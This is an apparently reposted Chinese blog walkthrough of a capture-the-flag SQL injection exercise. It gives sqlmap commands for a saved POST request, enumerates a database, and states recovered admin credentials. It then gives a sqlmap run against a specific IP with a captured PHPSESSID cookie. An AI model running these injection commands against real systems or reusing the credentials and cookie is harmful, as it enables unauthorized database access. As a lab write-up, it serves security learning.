sqlmap的post注入加cookie

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap的post注入加cookie相关的知识,希望对你有一定的参考价值。

1,首先看下这个网站


技术分享图片



2,用抓包工具进行抓包

技术分享图片


3,保存到txt文本文档为1.txt;


技术分享图片

4,sqlmap开始注入;

python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username --dbs

技术分享图片


获取表

python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" --tables

技术分享图片

python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" -T "user" --columns

技术分享图片


最终得到账号是admin密码u4g009


技术分享图片


登录成功,得到url

http://118.190.152.202:8011/?id=1

截取cookie

phpSESSID=gvfqspfsid48p2lf8e6iv0s9d0

继续sql注入

python2 sqlmap.py  -u "http://118.190.152.202:8011/?id=1" --cookie="PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0" --dbs

技术分享图片

最终得到flag

技术分享图片

以上是关于sqlmap的post注入加cookie的主要内容,如果未能解决你的问题,请参考以下文章

sqlmap进阶之路

SQLMAP自动注入

安全牛学习笔记SQLMAP- 自动注入

安全牛学习笔记​SQLMAP- 自动注入

使用sqlmap进行注入时level值至少为多少时sqlmap才会去测试cookie

SQL注入之sqlmap进阶